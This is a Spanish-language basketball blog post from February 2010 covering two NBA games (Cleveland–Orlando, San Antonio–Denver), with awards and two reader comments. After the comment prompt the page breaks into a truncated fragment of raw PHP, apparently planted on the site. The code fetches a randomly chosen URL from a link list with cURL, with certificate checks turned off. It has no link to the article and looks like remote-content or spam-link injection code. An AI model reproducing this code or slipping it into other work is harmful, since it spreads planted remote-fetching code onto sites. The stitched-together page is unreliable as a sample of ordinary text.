La Crónica (11/02/2010)

12 de February de 2010 por telekoman

Dos partidos de relumbrón para la jornada previa al All-Star, uno por conferencia.

En el Este, Orlando y Cleveland se batían el cobre para intentar conseguir el mismo objetivo final, el primer puesto de la conferencia. El gato al agua se lo llevaron los chicos de Lebron que consiguen su decimotercera victoria consecutiva, lo que supone un nuevo récord de la franquicia. Orlando se queda a 7 partidos del primer puesto y con la sensación de que estos Cavaliers son mucho equipo. Cleveland contó con la inestimable ayuda del O’Neal y Varejao para “parar” a Howard que se quedó en 19 puntos y 11 rebotes, algo lejos de los registros a los que nos tiene acostumbrados. También contaron con buenos defensores de perímetro como Moon o Anthony Parker que supieron frenar relativamente bien a los tiradores de Orlando, en especial a Carter.  Además Cleveland empieza a recuperar lesionados, como por ejemplo Delonte West que pueden ser una fuente adicional de alternativas en ataque y defensa. ¡Ah!, y por supuesto Lebron. 32 puntos, 13 asistencias y 8 rebotes. Poco más hay que decir. Por parte de Orlando creo que pueden destacar como positivo el hecho de que fueron capaces de mantenerse en el partido hasta prácticamente el final y eso es algo digno de mencionarse.

El otro partido enfrentó al flamante segundo clasificado de la conferencia Oeste, Denver, contra un equipo viejo, con dudas y bajas como es San Antonio. El resultado no ha podido ser más diferente de lo esperado. Después de la apabullante victoria del equipo de Colorado frente a Dallas, se podía pensar que los Spurs, sin la baja de última hora de su base titular Tony Parker, tendrían muchos problemas para llevarse la victoria. Sin embargo, gracias a un gran trabajo de equipo, con 7 jugadores por encima de 10 puntos, 6 jugadores por encima de 4 rebotes y 4 por encima de 4 asistencias, los del Alamo han conseguido una importante victoria que les permite mantenerse en la lucha por la 5 plaza del Oeste. Por contra los Nuggets se han basado en un trabajo mucho más individual, con Nene volviendo a hacer de las suyas en la zona alcanzando los 20 puntos, y Melo y Billups alcanzando los 19 y 17 puntos respectivamente, pero con muy malos porcentajes de tiro.

PREMIOS

MVP: Evidentemente hay pocas alternativas. Lebron, Lebron y luego también Lebron.

Rookie: Sin duda el mejor rookie de esta jornada atípica ha sido DeJuan Blair que se ha ido a los 17 puntos y 9 rebotes sin despeinarse mucho.

La sorpresa: Podríamos decir que la derrota de Denver ha supuesto una sorpresa importante, pero creo que la mayor de las sorpresas es la de ver a los Spurs empezando a rejuvenecer y dejando de depender únicamente de su tridente mágico.

La decepción: Creo que esta categoría la podemos dejar desierta. Nada de lo visto nos ha decepcionado hoy.

El mayor esfuerzo en vano: Se lo asignaremos a Nene y a Dwight Howard a la limón, por haber luchado con acierto frente a sus pares.

Y a partir de aquí,……… EL ALL STARS

Comenta

2 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Para mi al sorpresa y el factor decisivo en el Cavs-magic ha sido la de Hickson, que ha completado un muy buen partido. Alguien sabe si Powe jugará algo esta temporada?

    En el otro partido, supongo que el 8/9 de Nene en tiros de campo habrán sido mates o bandejas fáciles, no obstante grandisima temporada la del brasileño.

      Citar

  2. Sancho dice:
    #2

    pues yo le he visto tirarse sus tiritos desde tres-cuatro metros a Nené. la verdad que ese tio tiene cada día mas peso en su equipo. esta progresando genial. hay q decir q San Antonio esta vez no se durmió ante los arreones de Carmelo como les suele pasar siempre que la estrella rival despierta, y por eso ganaron. A pesar de eso… son un fantasma de conjunto, quien de un duro por ellos en playoffs lo perderá

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>